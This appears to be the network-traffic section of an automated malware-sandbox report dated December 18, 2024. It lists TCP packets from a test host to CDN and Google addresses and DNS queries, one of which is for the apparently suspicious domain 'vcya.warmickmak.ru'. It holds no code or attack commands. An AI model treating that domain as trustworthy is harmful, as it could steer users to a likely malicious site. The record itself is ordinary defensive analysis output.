                            Dec 18, 2024 21:05:36.169845104 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.171578884 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.171624899 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.171631098 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.186702967 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.187787056 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.187856913 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.187884092 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.191960096 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.191987991 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.192054033 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.192064047 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.192104101 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.194176912 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.194310904 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.194319963 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.194736958 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.203113079 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.203201056 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.203208923 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.211411953 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.211966038 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.211977005 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.237124920 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.254448891 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.260086060 CET49738443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:05:36.260143042 CET44349738142.250.181.132192.168.2.4
                            Dec 18, 2024 21:05:36.260457039 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.260499001 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.260859966 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.261162043 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.261174917 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.282953978 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.306945086 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.332380056 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.348593950 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.355017900 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.359306097 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.359366894 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.359383106 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.365555048 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.365612030 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.365629911 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.378371000 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.381171942 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.381249905 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.381258965 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.383124113 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.383183002 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.383203030 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.389250994 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.389302015 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.389309883 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.393377066 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.393441916 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.393450975 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.397234917 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.397289991 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.397299051 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.401779890 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.401833057 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.401839972 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.405164957 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.405325890 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.405334949 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.409343004 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.409398079 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.409404993 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.409429073 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.409518957 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.409733057 CET49753443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.409756899 CET44349753104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.413547993 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.413767099 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.413774967 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.414196968 CET49756443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.414235115 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.414352894 CET49756443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.414764881 CET49756443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.414787054 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.421641111 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.421690941 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.421695948 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.428555012 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.428613901 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.428621054 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.471627951 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.471652031 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.519330025 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.546947002 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.549906015 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.549994946 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.550023079 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.554538965 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.554630041 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.555175066 CET49752443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:36.555195093 CET44349752104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:36.799014091 CET8049723217.20.59.35192.168.2.4
                            Dec 18, 2024 21:05:36.799303055 CET4972380192.168.2.4217.20.59.35
                            Dec 18, 2024 21:05:36.800765991 CET4972380192.168.2.4217.20.59.35
                            Dec 18, 2024 21:05:36.920236111 CET8049723217.20.59.35192.168.2.4
                            Dec 18, 2024 21:05:37.503642082 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.504014969 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.504071951 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.504415989 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.504722118 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.504781008 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.504844904 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.551326036 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.639980078 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.640218973 CET49756443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.640243053 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.641024113 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.641411066 CET49756443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.641483068 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.641587973 CET49756443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.683330059 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.951884985 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.951936007 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.952106953 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.952177048 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.953828096 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.953896046 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.953912973 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.958226919 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.958287001 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.958302975 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.961256981 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.961312056 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.961325884 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.969834089 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:37.969896078 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:37.969912052 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.020032883 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.071521997 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.091304064 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.091392994 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.091470003 CET49756443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.092345953 CET49756443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.092365980 CET44349756104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.098897934 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.098987103 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.099081993 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.099334955 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.099370956 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.113620996 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.113647938 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.159446001 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.194026947 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.237936020 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.237972021 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.284307957 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.284321070 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.330393076 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.330437899 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.330537081 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.330548048 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.330591917 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.373944998 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.423078060 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.433481932 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.434250116 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.434288979 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.434317112 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.434328079 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.434372902 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.435997009 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.437777996 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.437820911 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.437849045 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.437854052 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.437896013 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.439630032 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.441364050 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.441404104 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.441435099 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.441440105 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.441481113 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.443142891 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.444962978 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.445023060 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.445028067 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.446794033 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.446842909 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.446858883 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.446866035 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.446898937 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.448532104 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.450351000 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.450416088 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.450419903 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.453888893 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.453902960 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.453974962 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.453979015 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.456667900 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.456715107 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.456748009 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.456753016 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.456803083 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.493983030 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.494066000 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.556463003 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.556556940 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.569436073 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.569492102 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.569536924 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.576268911 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.576335907 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.588625908 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.588701010 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.598027945 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.598093033 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.598428965 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.598475933 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.598503113 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.598541021 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.601138115 CET49755443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:38.601167917 CET44349755104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:38.627325058 CET49742443192.168.2.4172.67.158.29
                            Dec 18, 2024 21:05:38.671370029 CET44349742172.67.158.29192.168.2.4
                            Dec 18, 2024 21:05:38.960449934 CET44349742172.67.158.29192.168.2.4
                            Dec 18, 2024 21:05:38.960562944 CET44349742172.67.158.29192.168.2.4
                            Dec 18, 2024 21:05:38.960632086 CET49742443192.168.2.4172.67.158.29
                            Dec 18, 2024 21:05:38.962176085 CET49742443192.168.2.4172.67.158.29
                            Dec 18, 2024 21:05:38.962198973 CET44349742172.67.158.29192.168.2.4
                            Dec 18, 2024 21:05:39.100227118 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:39.100272894 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:39.100341082 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:39.100584030 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:39.100601912 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:39.535037041 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:39.535356045 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:39.535398006 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:39.535901070 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:39.536212921 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:39.536303997 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:39.536360025 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:39.579332113 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:39.580821037 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:39.982842922 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:39.982954025 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:39.983041048 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:40.008326054 CET49759443192.168.2.4104.18.95.41
                            Dec 18, 2024 21:05:40.008348942 CET44349759104.18.95.41192.168.2.4
                            Dec 18, 2024 21:05:40.325284004 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.325598955 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.325634003 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.326678038 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.326760054 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.328011036 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.328074932 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.328176975 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.328185081 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.380894899 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.780899048 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.781088114 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.781143904 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.781229019 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.781256914 CET4434976135.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.781271935 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.781322002 CET49761443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.782273054 CET49762443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.782334089 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:40.782408953 CET49762443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.782639980 CET49762443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:40.782658100 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:41.995840073 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:41.996157885 CET49762443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:41.996181965 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:41.996575117 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:41.996897936 CET49762443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:41.996974945 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:41.997023106 CET49762443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:42.043325901 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:42.457911968 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:42.458012104 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:42.458065987 CET49762443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:42.458623886 CET49762443192.168.2.435.190.80.1
                            Dec 18, 2024 21:05:42.458646059 CET4434976235.190.80.1192.168.2.4
                            Dec 18, 2024 21:05:51.831187963 CET8049724217.20.58.98192.168.2.4
                            Dec 18, 2024 21:05:51.831394911 CET4972480192.168.2.4217.20.58.98
                            Dec 18, 2024 21:05:51.831451893 CET4972480192.168.2.4217.20.58.98
                            Dec 18, 2024 21:05:51.951018095 CET8049724217.20.58.98192.168.2.4
                            Dec 18, 2024 21:06:24.176848888 CET49792443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:06:24.176898003 CET44349792142.250.181.132192.168.2.4
                            Dec 18, 2024 21:06:24.176951885 CET49792443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:06:24.177257061 CET49792443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:06:24.177270889 CET44349792142.250.181.132192.168.2.4
                            Dec 18, 2024 21:06:25.870785952 CET44349792142.250.181.132192.168.2.4
                            Dec 18, 2024 21:06:25.871071100 CET49792443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:06:25.871083975 CET44349792142.250.181.132192.168.2.4
                            Dec 18, 2024 21:06:25.871474028 CET44349792142.250.181.132192.168.2.4
                            Dec 18, 2024 21:06:25.871798038 CET49792443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:06:25.871876001 CET44349792142.250.181.132192.168.2.4
                            Dec 18, 2024 21:06:25.925055027 CET49792443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:06:35.579130888 CET44349792142.250.181.132192.168.2.4
                            Dec 18, 2024 21:06:35.579195976 CET44349792142.250.181.132192.168.2.4
                            Dec 18, 2024 21:06:35.579390049 CET49792443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:06:36.926331997 CET49792443192.168.2.4142.250.181.132
                            Dec 18, 2024 21:06:36.926357031 CET44349792142.250.181.132192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 18, 2024 21:05:20.262263060 CET53572251.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:20.354321957 CET53566191.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:23.098232985 CET53650341.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:24.113298893 CET6378253192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:24.113445044 CET5873853192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:24.250401974 CET53637821.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:24.250444889 CET53587381.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:26.038798094 CET5384153192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:26.038799047 CET5540453192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:26.410732031 CET53538411.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:26.410753012 CET53554041.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:30.453934908 CET5172953192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:30.454063892 CET6045253192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:30.454577923 CET5513953192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:30.454731941 CET5364053192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:30.455061913 CET5709453192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:30.455189943 CET6383953192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:30.591782093 CET53604521.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:30.591875076 CET53551391.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:30.591983080 CET53536401.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:30.592082024 CET53570941.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:30.592118025 CET53638391.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:30.592430115 CET53517291.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:32.560161114 CET5673853192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:32.560312033 CET5261153192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:32.705060005 CET53567381.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:32.705828905 CET53526111.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:32.725775003 CET6048653192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:32.725923061 CET6014353192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:32.863056898 CET53604861.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:32.866235018 CET53601431.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:34.367292881 CET6290953192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:34.367429018 CET6178353192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:34.385118008 CET5575253192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:34.385270119 CET5713653192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:34.503891945 CET53629091.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:34.504057884 CET53617831.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:34.522097111 CET53557521.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:34.522121906 CET53571361.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:36.386509895 CET138138192.168.2.4192.168.2.255
                            Dec 18, 2024 21:05:38.961780071 CET5633153192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:38.961901903 CET5772253192.168.2.41.1.1.1
                            Dec 18, 2024 21:05:39.099570036 CET53577221.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:39.099678040 CET53563311.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:40.249903917 CET53641031.1.1.1192.168.2.4
                            Dec 18, 2024 21:05:59.000173092 CET53565201.1.1.1192.168.2.4
                            Dec 18, 2024 21:06:19.629378080 CET53649101.1.1.1192.168.2.4
                            Dec 18, 2024 21:06:21.766942024 CET53519081.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 18, 2024 21:05:24.113298893 CET192.168.2.41.1.1.10xec43Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:24.113445044 CET192.168.2.41.1.1.10xc306Standard query (0)www.google.com65IN (0x0001)false
                            Dec 18, 2024 21:05:26.038798094 CET192.168.2.41.1.1.10xe47eStandard query (0)vcya.warmickmak.ruA (IP address)IN (0x0001)false
                            Dec 18, 2024 21:05:26.038799047 CET192.168.2.41.1.1.10xca55Standard query (0)vcya.warmickmak.ru65IN (0x0001)false
